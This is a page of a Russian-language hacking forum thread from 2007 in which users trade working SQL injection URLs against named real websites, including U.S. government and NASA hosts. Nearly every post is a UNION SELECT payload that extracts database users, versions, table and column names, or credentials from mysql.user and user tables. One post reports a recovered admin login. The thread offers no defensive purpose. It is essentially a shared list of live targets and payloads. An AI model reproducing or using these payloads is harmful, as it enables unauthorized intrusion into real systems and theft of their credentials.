ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2901  
Старый 22.08.2007, 21:28
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

портфолио фрилансера...
Его произведения ковырять лень...
Имхо если на родном есть скуль , то и в работах чтонить должно быть.
Код:
http://sibprojects.com/index.php?page=-8+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x3a),0x3a)/*

Последний раз редактировалось geezer.code; 23.08.2007 в 00:10..
 
Ответить с цитированием

  #2902  
Старый 22.08.2007, 23:24
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
Arrow

http://www.viking.tm

Код:
http://www.viking.tm/product.php?id=-1+union+select+1,concat(user(),char(58),database()),version(),44,55,66,77/*
http://www.vikinggames.hu

Код:
http://www.vikinggames.hu/product.php?id=-1+union+select+1,concat(user(),char(58),database()),version(),44,55,66,77/*

Последний раз редактировалось Nazaret2005; 22.08.2007 в 23:36..
 
Ответить с цитированием

  #2903  
Старый 23.08.2007, 00:18
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Nazaret2005  
http://www.viking.tm
баян, проверяй тут


вот чтоб, не флудить
Код:
http://broker.uz/index.php?a=5&b=-384+union+select+1,2,3,4,5,6,7
вывода нет (((( blind кажецо.

ps точно не blind только все равно неинтересно... нашел сайт месяца 3 назад, такое впечатление, чтокромеменя здесь вообще никто не бывает.

Последний раз редактировалось geezer.code; 23.08.2007 в 02:14..
 
Ответить с цитированием

  #2904  
Старый 23.08.2007, 00:25
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

>вывода нет (((( blind кажецо.
Есть вывод смотри в ссылке там где картинка должна быть
Код:
http://broker.uz/index.php?a=5&b=-384+union+select+version(),2,3,4,5,6,7/*
смотрим в ссылке на картинку:
http://broker.uz/index.php?a=5&b=4.1.22-standard-log
и т.д.

Последний раз редактировалось [53x]Shadow; 23.08.2007 в 02:20..
 
Ответить с цитированием

  #2905  
Старый 23.08.2007, 03:51
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://haytom.us/showarticle.php?id=-19+union+select+1,user(),version(),4,5/*
Код:
http://www.learningminds.us/article.php?id=-50708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*&act=print
 
Ответить с цитированием

  #2906  
Старый 23.08.2007, 09:20
Аватар для _-Ramos-_
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию

Порно сайт =))

Код:
http://karovideo.com/porno/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
admin:admin
 
Ответить с цитированием

  #2907  
Старый 23.08.2007, 12:01
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Не получается подобрать названия колонок

код:

http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
 
Ответить с цитированием

  #2908  
Старый 23.08.2007, 12:10
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Цитата:
Сообщение от fobofob  
Не получается подобрать названия колонок

код:

http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
5 версия
Код:
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAME,12,13,14,15,16%20from%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15,16%20from%20information_schema.columns/*
 
Ответить с цитированием

  #2909  
Старый 23.08.2007, 12:13
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

опять .gov:
nea.gov:
Код:
http://www.nea.gov/honors/heritage/fellows/fellow.php?id=-1993_09%27+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),8,9,10,11,12,13,14,15+from+mysql.user+limit+1,1/*
 
Ответить с цитированием

  #2910  
Старый 23.08.2007, 12:24
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

library01.gsfc.nasa.gov:
Код:
http://library01.gsfc.nasa.gov/search/images/imageslist.php?id=-470+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+mysql.user+limit+0,1/*&searchterm=everything&searchfield=entire
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ